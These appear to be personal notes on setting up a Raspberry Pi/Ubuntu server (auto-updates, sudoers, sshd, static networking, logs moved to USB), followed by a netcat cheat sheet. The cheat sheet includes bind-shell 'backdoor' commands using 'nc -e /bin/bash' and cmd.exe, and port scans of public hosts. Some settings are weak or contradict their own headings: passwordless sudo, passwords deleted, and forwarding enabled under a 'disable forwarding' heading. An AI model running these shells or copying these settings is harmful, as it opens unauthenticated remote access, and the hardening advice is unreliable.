Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
Unattended-Upgrade::Remove-Unused-Dependencies "true";
Unattended-Upgrade::Automatic-Reboot "true";
Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
Unattended-Upgrade::Automatic-Reboot-Time "02:00";

systemctl status unattended-upgrades
systemctl enable unattended-upgrades

user management

  • Remove user pi
userdel pi
rm -rf /home/pi
  • Change sudoers to allow users in the sudo group to change role without
    passwords

  • change in /etc/sudoers

%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
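  • After editing, validate the sudoers syntax before logging out:

visudo -c   # parse check of /etc/sudoers and included files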
  • Add password for root user
passwd root
  • Remove passwords from users
passwd -d ubuntu
  • Disable dsa key in sshd and remove dsa keys

  • comment in /etc/ssh/sshd_config

# HostKey /etc/ssh/ssh_host_dsa_key
rm /etc/ssh/ssh_host_dsa_key*
  • Disable deprecated setting and disable forwarding

  • add/change in /etc/ssh/sshd_config

# UsePrivilegeSeparation yes
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts no
X11Forwarding yes
  • Check sshd configuration
/usr/sbin/sshd -t

Network primary - /etc/network/interfaces.d/eth0

  • /etc/network/interfaces.d/eth0
auto eth0
iface eth0 inet static
address x.x.x.x
netmask 255.255.255.0
gateway x.x.x.x
  • disable dhcpcd client
systemctl disable  dhcpcd.service
  • ntp
/etc/systemd/timesyncd.conf:NTP=x.x.x.x y.y.y.y

systemctl status systemd-timesyncd.service

  • rng
systemctl status rng-tools.service

Monitoring (not done)

install and enable logcheck? logwatch?

  • /etc/motd
### WARNING ###
...
...
  • troubleshooting tools
apt install tcpdump lsof

System: Move heavy writes to USB drive (to save sdcard)

  • Use blkid to find the UUID for the USB drive partition
  • Create a single ext4 partition on the USB drive
blkid
fdisk /dev/sda
mkfs.ext4 /dev/sda1
  • Add to /etc/fstab: Example:
PARTUUID=7e60cada-01 /data      ext4    defaults,noatime,errors=remount-ro  0       2
mkdir /data
mkdir -p /data/var/cache /data/var/spool
mv /var/log /data/var
ln -sf /data/var/log /var/log
mv /var/cache/apt /data/var/cache/
ln -s /data/var/cache/apt /var/cache/
mv /var/spool/postfix /data/var/spool/
ln -s /data/var/spool/postfix /var/spool/
reboot
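  • After the reboot, confirm the USB partition is mounted where expected:

findmnt /data    # should show the ext4 partition from /etc/fstab
df -h /data      # confirm the expected size and usage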
  • disable journal

  • change to ‘volatile’ and restart

grep Storage /etc/systemd/journald.conf 
Storage=volatile
systemctl restart systemd-journald.service

netcat utilities

port scanning

A basic port scan command for an IP address looks like this:

nc -v -n 8.8.8.8 1-1000
nc -v google.com 1-1000

chat or web server

nc -l -p 1299


Then all you need to do is launch the chat session with a new TCP connection:

nc localhost 1299

basic web server

printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8999
w3m http://localhost:8999

HTTP requests with netcat

printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80

TCP server and TCP client

Run this Netcat command on the server instance to receive the file over port 1499:

nc -l 1499 > filename.out

run this command on the client to send the file and close the connection:

nc server.com 1499 < filename.in
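
Netcat gives no integrity guarantee, so a checksum on both sides is a simple way to confirm the transfer (file names as in the example above):

sha256sum filename.in    # on the client
sha256sum filename.out   # on the server; the hashes should match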

launching reverse (backdoor) shell

nc -n -v -l -p 5555 -e /bin/bash

From any other system on the network, you can connect and run commands on the
host after a successful Netcat connection:

nc -nv 127.0.0.1 5555

netcat fundamentals - command flags

nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output

netcat relays on linux

nc -l -p [port] 0<backpipe | nc [client IP] [port] | tee backpipe
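
backpipe is a named pipe that has to exist first; a fuller sketch of the relay (the listening port and client IP below are placeholders):

mkfifo backpipe
nc -l -p 8080 0<backpipe | nc 192.168.0.10 80 | tee backpipe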

netcat banners

echo "" | nc -zv -wl [host] [port range] – obtain the TCP banners for a range of ports

netcat backdoor shells

nc -l -p [port] -e /bin/bash – run a shell on Linux
nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows

Credits

JEFF PETTERS
Jeff has been working on computers since his Dad brought home an IBM PC 8086 with
dual disk drives. Researching and writing about data security is his dream job.

https://www.varonis.com/blog/author/jpetters/